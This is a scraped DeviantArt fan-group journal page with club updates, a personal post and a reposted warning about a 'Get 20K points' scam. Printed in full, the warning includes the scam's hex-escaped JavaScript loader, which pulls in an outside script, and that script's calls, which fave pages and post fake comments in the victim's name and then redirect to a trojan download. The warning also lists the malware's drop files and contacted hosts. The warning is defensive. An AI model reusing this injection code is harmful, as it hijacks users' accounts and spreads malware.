Journals92
Newest
FFVII: Remake and the Year of 2020
1 min read
Good Afternoon, RedLeather!
It has been quite some time since my last post - you'll have to forgive me as it seems I am still alone in running this. Life became a little crazy and I personally am trying to finish a degree. I won't abandon this group. I am all ears for your thoughts and opinions as to what we should do and how to collaborate activities within the club. I am thinking of everyone here as we remain a club and family among the hardship of COVID-19. If you ever need support, you can surely find it here in RedLeather - especially with me, you can always DM me!
Darkness aside however, rejoice for within the past couple days or so, I am SURE you all are playing the Final Fantasy VII: Remake! It is finally in our possession and I hope you enjoy the game, please be sure to keep your posts spoiler free if you can help it. We are all excited to see where the Remake will go.
Keep Genesis and LOVELESS in your thoughts. I cannot wait to hear from everyone soon!
- Red
Join the community to add your comment. Already a deviant? Log In
Friends around the World
1 min read
Is anyone selling their FF7 Loveless Locket? Please help, I'd love it for cosplay.
Join the community to add your comment. Already a deviant? Log In
SWAT
2 min read
HAHAHA.
So in this past week, I almost died. It went as far as involving the SWAT team. Yeah, talk about narly. So hi guys! I'm still alive, I'm going back to school and I'll be here in a little more. I'll be in art class (so yay finally art stuff!) and hopefully, I'll be uploading costumes in progress because I'm in a costume class too. What's happening this year for me? School. I'm also house shopping in Bellevue so my special lady and I can get an idea of where exactly we can live and afford to thrive. We're figuring out little things like transportation, house warming things, and how close we can enclose the living together ordeal. She's almost done with school so it may be closer than I thought.
I'm finally back on DA, hopefully around a little more to show off my future works of art. Life has been hectic. I have nearly died, lost my home and its utilities, got in a fight - jamming three fingers and ruining my left shoulder, lost my pets, lost my job, and lost my opportunity to go to school. That's a little too much for me to be losing, things have been hell on wheels. I also discovered there are a lot of things wrong with me and the school offered to evaluate me further. That's sort of scary but I can see the root of why.
Anyway, I sit here, hopefully someone watches or reads these things from me. My Great Dane puppy sleeps on the couch with me as I do this. We're both content as I type away, talking to my lady on Skype. It's a decent, quiet night. There shall be Hell in the morning.
So in this past week, I almost died. It went as far as involving the SWAT team. Yeah, talk about narly. So hi guys! I'm still alive, I'm going back to school and I'll be here in a little more. I'll be in art class (so yay finally art stuff!) and hopefully, I'll be uploading costumes in progress because I'm in a costume class too. What's happening this year for me? School. I'm also house shopping in Bellevue so my special lady and I can get an idea of where exactly we can live and afford to thrive. We're figuring out little things like transportation, house warming things, and how close we can enclose the living together ordeal. She's almost done with school so it may be closer than I thought.
I'm finally back on DA, hopefully around a little more to show off my future works of art. Life has been hectic. I have nearly died, lost my home and its utilities, got in a fight - jamming three fingers and ruining my left shoulder, lost my pets, lost my job, and lost my opportunity to go to school. That's a little too much for me to be losing, things have been hell on wheels. I also discovered there are a lot of things wrong with me and the school offered to evaluate me further. That's sort of scary but I can see the root of why.
Anyway, I sit here, hopefully someone watches or reads these things from me. My Great Dane puppy sleeps on the couch with me as I do this. We're both content as I type away, talking to my lady on Skype. It's a decent, quiet night. There shall be Hell in the morning.
Join the community to add your comment. Already a deviant? Log In
Stop the 'Get 20K points' invasion!
8 min read
I took this from 
Stop the "Get 20K points" invasion
Before you do anything stupid, please read this
Obviously, this offer is swindling.
And as such it is dangerous for you !
What it does
"\x61" is just another way to write "a" (ISO hexadecimal encoding)
Thus,
["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]
is just written words. Script actually.
You can have it safely translated by using the "unescape" Javascript function, on this part of the script only.
Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page.
This script can be found here :
deviantart.hp.af.cm/generator/…
This script will now be able to act in your name
Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.
This new script does something else.
For now (but it might change) :
document.getElementById("gmi-ResourceViewFaveButton").click();
It simulates click on the "Fave" button.
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".
setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
It programs something that will hide this actions by reopening the comment area once it is posted.
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
It validates the comment (in you name).
window.top.location.href='deviantart.hp.af.cm/generator';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"
And then what ?
And then you wont get any DA points, indeed. I bet you guessed yet…
Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
I don't know (yet) what this exe file does. But I know what it could do.
First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks…
If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.
What can we do ?
For now, we can try to warn and inform people.
Try to make them stop spreading this stupid hoax.
If you have any idea of what more to do, please, comment.
OMG my brother did it !
I did not download/run that exe file, am I safe ?
As far as I know
There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.
Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).
Connected Viruses/Malware/Adware identified
One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
Trojan
Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
Identified by Fortinet as MSIL/Agent.HG!tr.spy
Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
Identified by many other malware detectors as Trojan.GenericKD.966175
This is a serious threat
This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
Some antivirus are free. See the Mighty Source of all Truth for reference.
Fresh news here thanks to ~krisiskiller101 investigations !
He was able to get rid of it using MalwareBYTES
He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
Thanks for the info !
AdWare.iBryte.H
seems to be a recent version of wellknown adware iBryte
Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
Optimum Installer (fs)
Might be a wrong positive
There is plenty of removal instruction tutorials (please, tell us if you have any success with one of them)
Personal investigations
I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff.
Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help.
This program does the following :
It mess up your registry in a theatrical way
It probably affects the download manager associated with your web browser
It probably affects the toolbars in your web browser
Writes 'test' everywhere in the registry
Mess up with your ie cache
Creates files
Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
Runs the created exe file, which in turn spoils your computer :
Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Transfers data through internet with following addresses
imp.oi-imp1.com
config.oi-config1.com
d1uc4fr8hoy8ts.cloudfront.net
cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
cache-download.real.com
d2m.adk-mobile.com
Probably displays advertising
Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
-edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.
This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection.
If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update.
This information might even be wrong depending on your OS and configuration !
Thanks for reading!
Pass it on!
Stop the "Get 20K points" invasion
Before you do anything stupid, please read this
Obviously, this offer is swindling.
And as such it is dangerous for you !
What it does
"\x61" is just another way to write "a" (ISO hexadecimal encoding)
Thus,
["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]
is just written words. Script actually.
You can have it safely translated by using the "unescape" Javascript function, on this part of the script only.
Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page.
This script can be found here :
deviantart.hp.af.cm/generator/…
This script will now be able to act in your name
Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.
This new script does something else.
For now (but it might change) :
document.getElementById("gmi-ResourceViewFaveButton").click();
It simulates click on the "Fave" button.
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".
setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
It programs something that will hide this actions by reopening the comment area once it is posted.
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
It validates the comment (in you name).
window.top.location.href='deviantart.hp.af.cm/generator';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"
And then what ?
And then you wont get any DA points, indeed. I bet you guessed yet…
Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
I don't know (yet) what this exe file does. But I know what it could do.
First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks…
If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.
What can we do ?
For now, we can try to warn and inform people.
Try to make them stop spreading this stupid hoax.
If you have any idea of what more to do, please, comment.
OMG my brother did it !
I did not download/run that exe file, am I safe ?
As far as I know
There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.
Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).
Connected Viruses/Malware/Adware identified
One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
Trojan
Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
Identified by Fortinet as MSIL/Agent.HG!tr.spy
Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
Identified by many other malware detectors as Trojan.GenericKD.966175
This is a serious threat
This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
Some antivirus are free. See the Mighty Source of all Truth for reference.
Fresh news here thanks to ~krisiskiller101 investigations !
He was able to get rid of it using MalwareBYTES
He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
Thanks for the info !
AdWare.iBryte.H
seems to be a recent version of wellknown adware iBryte
Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
Optimum Installer (fs)
Might be a wrong positive
There is plenty of removal instruction tutorials (please, tell us if you have any success with one of them)
Personal investigations
I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff.
Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help.
This program does the following :
It mess up your registry in a theatrical way
It probably affects the download manager associated with your web browser
It probably affects the toolbars in your web browser
Writes 'test' everywhere in the registry
Mess up with your ie cache
Creates files
Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
Runs the created exe file, which in turn spoils your computer :
Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
Transfers data through internet with following addresses
imp.oi-imp1.com
config.oi-config1.com
d1uc4fr8hoy8ts.cloudfront.net
cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
cache-download.real.com
d2m.adk-mobile.com
Probably displays advertising
Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
-edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.
This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection.
If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update.
This information might even be wrong depending on your OS and configuration !
Thanks for reading!
Pass it on!
Join the community to add your comment. Already a deviant? Log In
Snap!
3 min read
Join the community to add your comment. Already a deviant? Log In